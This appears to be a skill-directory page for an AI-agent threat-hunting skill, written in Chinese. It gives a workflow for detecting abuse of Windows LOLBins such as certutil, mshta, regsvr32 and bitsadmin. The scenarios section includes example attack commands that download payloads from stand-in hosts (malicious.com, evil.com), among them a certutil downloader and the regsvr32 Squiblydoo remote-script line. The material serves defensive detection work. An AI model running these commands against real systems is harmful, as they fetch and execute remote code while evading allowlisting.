hunting-for-living-off-the-land-binaries

主动狩猎攻击者滥用合法系统二进制文件(LOLBin)执行恶意载荷并规避检测的行为。

9 stars

Best use case

hunting-for-living-off-the-land-binaries is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

主动狩猎攻击者滥用合法系统二进制文件(LOLBin)执行恶意载荷并规避检测的行为。

Teams using hunting-for-living-off-the-land-binaries should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/hunting-for-living-off-the-land-binaries/SKILL.md --create-dirs "https://raw.githubusercontent.com/killvxk/cybersecurity-skills-zh/main/skills/hunting-for-living-off-the-land-binaries/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/hunting-for-living-off-the-land-binaries/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How hunting-for-living-off-the-land-binaries Compares

Feature / Agenthunting-for-living-off-the-land-binariesStandard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

主动狩猎攻击者滥用合法系统二进制文件(LOLBin)执行恶意载荷并规避检测的行为。

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# 狩猎系统内置工具滥用(LOLBin)

## 适用场景

- 调查绕过传统杀毒软件的无文件恶意软件活动时
- 主动威胁狩猎针对防御规避技术时
- EDR 告警触发合法二进制文件执行异常子进程时
- 威胁情报报告显示活跃活动中存在 LOLBin 滥用后
- 红队/紫队演练验证 T1218 的检测覆盖率时

## 前置条件

- 访问 EDR 遥测(CrowdStrike、Microsoft Defender for Endpoint、SentinelOne)
- 包含进程创建日志的 SIEM(Sysmon 事件 ID 1、Windows 安全 4688)
- 熟悉 LOLBAS 项目(lolbas-project.github.io)参考列表
- 已启用 PowerShell 命令行日志(模块日志、脚本块日志)
- 用于关联出站连接的网络代理或防火墙日志

## 工作流程

1. **定义狩猎假设**:基于威胁情报制定假设(如"攻击者正在使用 certutil.exe 从外部域名下载二阶段载荷")。
2. **识别目标 LOLBin**:从 LOLBAS 项目数据库中选择特定二进制文件进行狩猎,优先选择与当前威胁态势匹配的(certutil、mshta、rundll32、regsvr32、msiexec、wmic、cmstp、bitsadmin)。
3. **收集进程遥测数据**:查询 EDR 或 SIEM 中涉及目标 LOLBin 的进程创建事件,重点关注异常命令行参数、父进程或执行上下文。
4. **建立正常行为基线**:通过分析历史频率、典型父进程和标准参数,确定每个 LOLBin 在环境中的合法使用模式。
5. **识别异常**:将当前遥测数据与基线进行比对,标记包含网络连接、编码命令、异常文件路径或异常父子进程链的执行。
6. **关联与丰富**:将异常 LOLBin 活动与网络日志、DNS 查询、文件创建事件和威胁情报 feeds 进行交叉关联。
7. **记录和报告**:记录发现、更新检测规则,并为已识别的恶意 LOLBin 使用创建 IOC 列表。

## 核心概念

| 概念 | 描述 |
|------|------|
| LOLBin | 被攻击者用于恶意目的的合法操作系统二进制文件 |
| LOLBAS 项目 | 社区维护的 Windows LOLBin、LOLLib 和 LOLScript 列表 |
| T1218 | MITRE ATT&CK——签名二进制文件代理执行 |
| T1218.001 | 编译 HTML 文件(mshta.exe) |
| T1218.002 | 控制面板(control.exe) |
| T1218.003 | CMSTP |
| T1218.005 | Mshta |
| T1218.010 | Regsvr32 |
| T1218.011 | Rundll32 |
| T1197 | BITS 任务(bitsadmin.exe) |
| T1140 | 解混淆/解码文件(certutil.exe) |
| 代理执行 | 使用受信任的二进制文件执行不受信任的代码 |
| 无文件攻击 | 主要在内存中运行而不落盘的攻击 |

## 工具与系统

| 工具 | 用途 |
|------|------|
| CrowdStrike Falcon | EDR 遥测和进程树分析 |
| Microsoft Defender for Endpoint | 使用 KQL 查询进行高级威胁狩猎 |
| Splunk | SIEM 日志聚合和 SPL 查询 |
| Elastic Security | 检测规则和时间线调查 |
| Sysmon | 详细的进程创建和网络日志 |
| LOLBAS 项目 | LOLBin 能力参考数据库 |
| Sigma Rules | LOLBin 通用检测规则格式 |
| Velociraptor | 终端取证采集和狩猎 |

## 常见场景

1. **certutil 下载器**:攻击者使用 `certutil.exe -urlcache -split -f http://malicious.com/payload.exe` 下载恶意软件,绕过允许 certutil 流量的 Web 代理。
2. **mshta HTA 执行**:攻击者通过邮件投递 HTA 文件,通过 `mshta.exe`(Microsoft 签名的二进制文件)执行 VBScript 载荷。
3. **rundll32 DLL 代理加载**:通过 `rundll32.exe shell32.dll,ShellExec_RunDLL` 加载恶意 DLL,通过受信任的二进制文件代理执行。
4. **regsvr32 Squiblydoo**:通过 `regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll` 执行远程 SCT 文件,绕过应用程序白名单。
5. **bitsadmin 持久化**:攻击者使用 `bitsadmin /transfer` 创建 BITS 传输任务,反复下载并执行载荷。

## 输出格式

```
狩猎 ID:TH-LOLBIN-[日期]-[序号]
假设:[陈述的假设]
调查的 LOLBin:[二进制文件列表]
时间范围:[开始] - [结束]
数据源:[EDR、Sysmon、SIEM]
发现:
  - [发现 1 及证据]
  - [发现 2 及证据]
检测到的异常数:[数量]
真阳性:[数量]
假阳性:[数量]
已识别 IOC:[列表]
已创建/更新检测规则:[列表]
建议:[后续步骤]
```

Related Skills

performing-threat-landscape-assessment-for-sector

9
from killvxk/cybersecurity-skills-zh

通过分析威胁行为者定向攻击模式、常见攻击向量和行业特定漏洞,开展行业特定威胁态势评估,为组织风险管理提供决策依据

performing-threat-hunting-with-yara-rules

9
from killvxk/cybersecurity-skills-zh

使用 YARA 模式匹配规则在文件系统和内存转储中狩猎恶意软件、可疑文件和入侵指标。 涵盖规则编写、yara-python 扫描以及与威胁情报源的集成。

performing-threat-hunting-with-elastic-siem

9
from killvxk/cybersecurity-skills-zh

使用 KQL/EQL 查询、检测规则和 Timeline 调查在 Elastic Security SIEM 中执行主动威胁狩猎, 识别绕过自动检测的威胁。适用于 SOC 团队针对特定 ATT&CK 技术进行狩猎、调查异常行为, 或使用 Elasticsearch 和 Kibana Security 验证检测覆盖缺口。

hunting-living-off-the-land-binaries

9
from killvxk/cybersecurity-skills-zh

检测 Windows 事件日志和 Sysmon 遥测数据中对离地攻击(Living Off The Land Binaries,LOLBAS)的滥用, 包括 certutil、wmic、mshta、regsvr32 和 rundll32 等工具。 通过将进程创建事件与 LOLBAS 项目数据库交叉比对来构建检测规则。 适用于针对无文件攻击技术的威胁狩猎或构建 SIEM 检测规则的场景。

hunting-for-webshells-in-web-servers

9
from killvxk/cybersecurity-skills-zh

通过扫描高熵值文件、可疑的 PHP/JSP/ASP 模式(eval、base64_decode、system、passthru)、 Web 根目录中近期修改的文件以及异常文件大小,检测植入 Web 服务器的 Webshell(网页后门)。 使用香农熵(Shannon entropy)计算标记混淆载荷,并通过正则表达式模式匹配已知 Webshell 特征。

hunting-for-webshell-activity

9
from killvxk/cybersecurity-skills-zh

通过分析 Web 目录中的文件创建行为、Web 服务器异常进程派生以及异常 HTTP 模式,狩猎面向互联网服务器上的 Webshell 部署。

hunting-for-unusual-service-installations

9
from killvxk/cybersecurity-skills-zh

通过解析系统事件日志中的事件 ID 7045、分析服务二进制路径并识别持久化机制指标,检测可疑 Windows 服务安装(MITRE ATT&CK T1543.003)。

hunting-for-unusual-network-connections

9
from killvxk/cybersecurity-skills-zh

通过分析出站流量模式、稀有目标地址、非标准端口和终端异常连接频率,狩猎异常网络连接。

hunting-for-supply-chain-compromise

9
from killvxk/cybersecurity-skills-zh

狩猎供应链入侵指标,包括木马化软件更新、受损依赖项、未授权代码修改和被篡改的构建产物。

hunting-for-startup-folder-persistence

9
from killvxk/cybersecurity-skills-zh

通过监控 Windows 启动目录中的可疑文件创建、分析 autoruns 条目以及使用 Python watchdog 进行实时文件系统监控,检测 T1547.001 启动文件夹持久化。

hunting-for-spearphishing-indicators

9
from killvxk/cybersecurity-skills-zh

跨电子邮件日志、终端遥测和网络数据狩猎鱼叉式网络钓鱼活动指标,检测定向邮件攻击。

hunting-for-shadow-copy-deletion

9
from killvxk/cybersecurity-skills-zh

通过监控 vssadmin、wmic 和 PowerShell 卷影副本命令,狩猎表明勒索软件准备或反取证活动的卷影副本删除行为。